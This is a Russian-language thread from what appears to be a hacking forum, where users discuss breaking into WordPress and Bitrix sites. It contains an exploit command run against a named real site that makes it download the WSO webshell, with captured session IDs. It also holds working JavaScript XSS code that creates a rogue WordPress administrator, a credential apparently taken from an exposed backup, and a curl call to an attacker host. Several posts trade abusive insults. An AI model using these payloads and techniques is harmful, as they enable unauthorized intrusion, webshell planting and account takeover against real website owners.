• XSS.stack #1 – первый литературный журнал от юзеров форума

Как использовать PHP эксплойты и где взять информацию о взломе панели Wordpress?

Не вижу проблемы, просто хост не существующий
Код:
php codex.php https://google.com system curl http://google.com/

### composite_data problems ###
и что же покажет сущевствующий хост? ;)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
и что же покажет сущевствующий хост? ;)
Cессию, результат загрузки, результат выполнения.

Код:
php codex.php https://www.bitrix24.com.br system curl https://raw.githubusercontent.com/mIcHyAmRaNe/wso-webshell/master/wso.php



### PHPSESSID=PJ8zZwZPbkm40Fm2rvDOCmPQ8pvAboHc;, sessid=0fa69b0c6e228d31e1dad5b85e3b0fcb ###

###

 ###

А по вп, он бьется как сплоитами, так и без не смотря на автообнавление.

Банальная XSS может помочь тебе добавить админа (коих пачка и за этот год: https://sploitus.com/?query=wordpress) :

Код:
var wp_root = "" // don't add a trailing slash
var req = new XMLHttpRequest();
var url = wp_root + "/wp-admin/user-new.php";
var regex = /ser" value="([^"]*?)"/g;
req.open("GET", url, false);
req.send();
var nonce = regex.exec(req.responseText);
var nonce = nonce[1];
var params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=hacker&email=hacker@example.com&pass1=AttackerP455&pass2=AttackerP455&role=administrator";
req.open("POST", url, true);
req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
req.send(params);

Так и банально забытый бэкап, может выдать тебе пасс казалось бы не брутабельного админа:


// curl_setopt_array($curl, array(
// CURLOPT_URL => 'https://test.j3university.com/wp-json/jwt-auth/v1/token',
// CURLOPT_POST => TRUE,
// CURLOPT_RETURNTRANSFER => TRUE,
// CURLOPT_CUSTOMREQUEST => "POST",
// CURLOPT_POSTFIELDS => "username=vinay&password=YqiHcALG7wKuRaxA8nGGFNfF",

Вариантов масса с WP.
 
Cессию, результат загрузки, результат выполнения.

Код:
php codex.php https://www.bitrix24.com.br system curl https://raw.githubusercontent.com/mIcHyAmRaNe/wso-webshell/master/wso.php



### PHPSESSID=PJ8zZwZPbkm40Fm2rvDOCmPQ8pvAboHc;, sessid=0fa69b0c6e228d31e1dad5b85e3b0fcb ###

###

 ###

А по вп, он бьется как сплоитами, так и без не смотря на автообнавление.

Банальная XSS может помочь тебе добавить админа (коих пачка и за этот год: https://sploitus.com/?query=wordpress) :

Код:
var wp_root = "" // don't add a trailing slash
var req = new XMLHttpRequest();
var url = wp_root + "/wp-admin/user-new.php";
var regex = /ser" value="([^"]*?)"/g;
req.open("GET", url, false);
req.send();
var nonce = regex.exec(req.responseText);
var nonce = nonce[1];
var params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=hacker&email=hacker@example.com&pass1=AttackerP455&pass2=AttackerP455&role=administrator";
req.open("POST", url, true);
req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
req.send(params);

Так и банально забытый бэкап, может выдать тебе пасс казалось бы не брутабельного админа:





Вариантов масса с WP.
а ты уверен что вбивать нужно так как ты вбиваешь а не в сплойт добавлять эти строки? ;)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Продолжим просвещать, а вдруг реально все так плохо ;-)

Код:
(!isset($argv[3]) ? exit(message('php '.basename(__FILE__).' "https://target-bitrix.com" "system" "curl http://attacker.com/"')) : @list($x, $url, $func, $farg) = $argv);

$argv​

Contains an array of all the arguments passed to the script when running from the command line.
 
считает себя неебаца умным
Откуда такие выводы? Тебя просто попросили показать как запустить сплойт под битрикс, ты даже этого не осилил, немощ. Еще и пиздить начал что я бухой. Я в отличии от тебя не пью и не употребляю, а ты, обезъяна, видимо все мозги просолил, раз занимаешься такой х#йней - лезешь в тему нихуя вообще в ней не понимая.
 
Откуда такие выводы? Тебя просто попросили показать как запустить сплойт под битрикс, ты даже этого не осилил, немощ. Еще и пиздить начал что я бухой. Я в отличии от тебя не пью и не употребляю, а ты, обезъяна, видимо все мозги просолил, раз занимаешься такой х#йней.
зачем тебе сплойт под битрикс ты по снг работаешь? ;) и не я неосилятор а ты настолько тупой что вопрос задаёшь не верно, ты сказал так что блядь просто вообще смешно, вопросы вначале научись задавать правильно ато ты очень глупо задал вопрос ;)
 
Привет, ранее я обучался любой теме по стратегий "узнал, посмотрел гайды, практикуйся"
Но когда я начал изучать WordPress и как ломать подобные CMS споткнулся об второй этап моей "стратегий".
К примеру, индексирую сайт, знаю версию, знаю имя админа, увидел плагин, нашел эксплоит на exploit-db, а что делать дальше хз.
Вся информация которая мне доступна это гайды индусов на ютубе, хабр и журнал xakep. Брут по словарям и использование гитов 2022 разбиваются об сложный пароль или обновленную версию WP.

Заранее спасибо
upd: даже версия эксплойта для плагина 2019 года:confused:
Добрый день. Мне кажется для начала нужно освоить минимальные основы самого вп, ибо без этого будет очень сложно понимать что и как работает, по поводу взлома, зависит от конкретных уязвимостей. Так же можно попробовать скрутить админку, но это не очень хороший вариант.

По поводу ситуации с плагином для начала нужно найти конкретные cve.
К примеру на: https://cve.mitre.org/.
После на гитхаб или exploit db искать сплоиты. Так же вот в ТГ канале хороший сборник https://t.me/citsecurity/6166 .
Не работать может к примеру из за того что версия плагина другая, или ее разрабы как то устранили.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх